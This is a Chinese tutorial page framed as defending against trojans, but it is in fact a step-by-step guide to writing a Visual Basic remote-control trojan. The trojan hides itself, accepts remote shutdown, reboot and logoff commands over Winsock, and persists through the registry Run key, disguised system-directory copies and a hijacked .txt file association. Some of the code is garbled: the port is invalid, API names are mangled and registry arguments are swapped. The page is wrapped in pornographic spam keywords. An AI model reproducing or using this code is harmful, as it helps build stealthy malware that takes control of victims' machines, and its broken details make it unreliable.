麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 編程 > Visual Basic > 正文

利用VisualBasic防范木馬類攻擊

2019-11-18 17:28:42
字體:
來源:轉載
供稿:網友
首先,新建一工程,名為Server,新建一個窗體,Name為Server,在窗體中加入一個winsock控件,Name設為sckServer,協議設為默認的TCP/ip協議。

  接下來我們回來Server窗體模塊中,添加如下代碼:

->PRivateSubform_Load()
 WithMe
  .sckServer.LocalPort=88917'本地端口(呵呵!我的生日!)
  .sckServer.Listen'開始監聽
 EndWith
EndSub

'接受客戶端的連接請求。

PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
 WithMe
  If.sckServer.State<>sckClosedThen.sckServer.Close
  .sckServer.Accept(requestID)
 EndWith
EndSub->

  下面我們來建立客戶端程序:新建一個工程,名為Client,把窗體名為Client,在上面加入一個winsock控件,名為sckClient,協議為TCP/IP協議。再加一個按鈕cmdConnect在窗體模塊中加入代碼:

->PrivateSubform_Load()
 WithMe
  .sckClient.RemoteHost="127.0.0.1"'設置遠程IP,本例設為本機。
  .sckClient.RemotePort=88917'遠程端口,就為server中的設置一樣.
 EndWith
EndSub

PrivatesubcmdConnect_Click()
 SckClient.Connect
Endsub->

  至此,單擊Connect按鈕我們的兩個工程已經可以進行通信了,但看不見,你可以在Client中的sckClient_Connect事件中加入代碼:debug.print“Connetionsuccessful!”來查看。

  這僅是第一步,一點工作也做不了,下面我們來為它們添加功能。為了簡單,本文章只實現一點小小的功能―――關機,重啟,注銷。好,開始吧!

  在Server工程中新建一個模塊,Name為modApi,這個模快為一些API函數,添加如下API函數:

->PublicDeclareFunctionExitWindowXXXLib"user32"Alias"ExitWindowXXX"(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong

PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLib"user32"Alias"ClipCursor"(lpRectAsAny)AsLong

PublicTypeRECT
 LeftAsLong
 TopAsLong
 RightAsLong
 BottomAsLong
EndType->

  注:在兩個socket中編程中,進行通信的重要事件是DataArrival事件,用于接收遠程數據。

  下面在Client工程的Client窗體中放入三個按鈕,分別為cmdExit,cmdLogoff,cmdReboot。它們用于對遠程的關機,注銷,重啟操作。分別添加如下代碼:

->PrivateSubcmdExit_Click()
 Me.sckClient.SendData"Exit"
EndSub

PrivateSubcmdLogoff_Click()
 Me.sckClient.SendData"Logoff"
EndSub

PrivateSubcmdReboot_Click()
 Me.sckClient.SendData"Reboot"
EndSub->

  全都是對服務端發出請求。下面轉到Server工程中:在Server中添加sckServer的DataArrial事件,接收客戶端的請求。

->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
 DimstrDataAsString
 WithMe
  '接收客戶請求的信息
  .sckServer.GetDatastrData
  SelectCasestrData
   Case"Exit"
    '關機
    CallExitWindowXXX(EWX_SHUTDOWN,0)
   Case"Reboot"
    '重啟
    CallExitWindowXXX(EWX_REBOOT,0)
   Case"Logoff"
    '注銷
   CallExitWindowXXX(EWX_LOGOFF,0)
  EndSelect
 EndWith

EndSub->

  好了,到此我們已經實現功能了,但還不行,我們要它在背后運行。這簡單,在Server中的form_Load事件中加入一句:me.hide。好這下看不見了,但大家知道木馬是一開機就自動運行了,這又是為什么,怎么實現的?把它加入到注冊表的啟動組中?對,不錯,跟我來吧!

  回到Server工程中的modApi中加入如下API函數:

->PublicDeclareFunctionRegOpenKeyLib"advapi32.dll"Alias"RegOpenKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong

PublicDeclareFunctionRegSetvalueExLib"advapi32.dll"Alias"RegSetvalueExA"(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong

PublicDeclareFunctionRegCreateKeyLib"advapi32.dll"Alias"RegCreateKeyA"(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3

PublicConstREG_SZ=1

PublicConstHKEY_LOCAL_MACHINE=&H80000002

PublicConstHKEY_CLASSES_ROOT=&H80000000->

  寫到注冊表啟動組中的過程。

->PublicSubStartupGroup()

 DimsKeyAsString
 DimresultAsLong
 DimhKeyIDAsLong
 DimsKeyValAsString

 sKey="Systrsy"'啟動組中的鍵,找一個與系統文件相近的。
 sKeyVal="C:/windows/system/systrsy.exe"'木馬文件的路徑,可以用GetSystemDirectory來取得系統路徑。
 result=RegOpenKey(HKEY_LOCAL_MACHINE,_
   "Software/Microsoft/Windows/CurrentVersion/Run",hKeyID)
 Ifresult=0Then
  result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
 EndIf
EndSub->

  好,就這樣簡單地完成了。但是,想過沒有,如果不是很菜的鳥,到注冊表中見一刪,我們苦苦的心血不就白白地浪費了嗎?不行,還得想讓他發現了刪也刪不掉。請看下面的代碼:

->PublicSubWriteToTxt()

 DimresultAsLong
 DimhKeyIDAsLong
 DimskeyAsString
 DimskeyValAsString

 skey="txtfile/shell/open/command"
 skeyVal="C:/windows/system/txtView.exe"
 result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)

 Ifresult=0Then
  result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
 EndIf
EndSub->

  肯定不少朋友一看就知道了,原是與txt文件進行關聯,一點也不錯,但C:/windows/system/txtView.exe是哪里來的,我們的木馬是C:/windows/system/systrsy.exe呀。這可是我們木馬的分身了。

  好,回到Server工程的Server窗體的form_Load中,加入如下代碼:

->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&"/"&App.EXEName&".exe"
sSystemDir=“C:/windows/system”
OnErrorResumeNext

 '復制文件成系統目錄下的Systrsy.exe
 FileCopysCurrentPath,sSystemDir&"/Systrsy.exe"
OnErrorResumeNext

復制文件成系統目錄下的txtView.exe

FileCopysCurrentPath,sSystemDir&"/txtView.exe"->

  調用

->CallstartupGroup
CallWriteToTxt

'判斷程序是否下在運行

IfApp.PrevInstanceThen
 '如果已經運行就退出。
End

EndIf->

  注意:

  1、大家在處理端口是最好使用高端端口,否則會和一些常用端口發生沖突

  2、在第一次使用VB.NET的最好看看有關的圖書
->

以上就是如何利用VisualBasic防范木馬類攻擊,希望大家知己知彼,防范于未然!

 

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表

圖片精選

主站蜘蛛池模板: 免费在线看a | 国产精品午夜未成人免费观看 | 一边吃奶一边摸下娇喘 | 日韩视频高清 | 国产91丝袜在线播放 | 久草在线观看福利 | 黄色成人小视频 | 天天色综合6 | 精品国产一区二区三区四区在线 | 国产人成精品一区二区三 | 激情宗合 | 色淫视频| 久久91久久 | 视频在线91| 精品国产91久久久久 | 99在线免费观看视频 | 色97色 | 久久综合一区 | 欧美成人性生活片 | 久久久一区二区三区四区 | 干色视频 | 成人做爽爽爽爽免费国产软件 | 全黄性性激高免费视频 | 深夜免费观看视频 | 国产黄色网页 | 久久久久久久久日本理论电影 | 久久精品国产一区二区电影 | 最新中文字幕第一页视频 | 一本一本久久a久久精品综合小说 | 欧美亚州| 99这里精品| 久久久99精品视频 | 国产精品久久久久久久久久三级 | 亚洲成人在线免费 | 好吊一区二区三区 | 黄色网址在线免费 | 男女一边摸一边做羞羞视频免费 | 国产精品热 | 爱射av| 久久久www成人免费毛片 | 在线播放91 |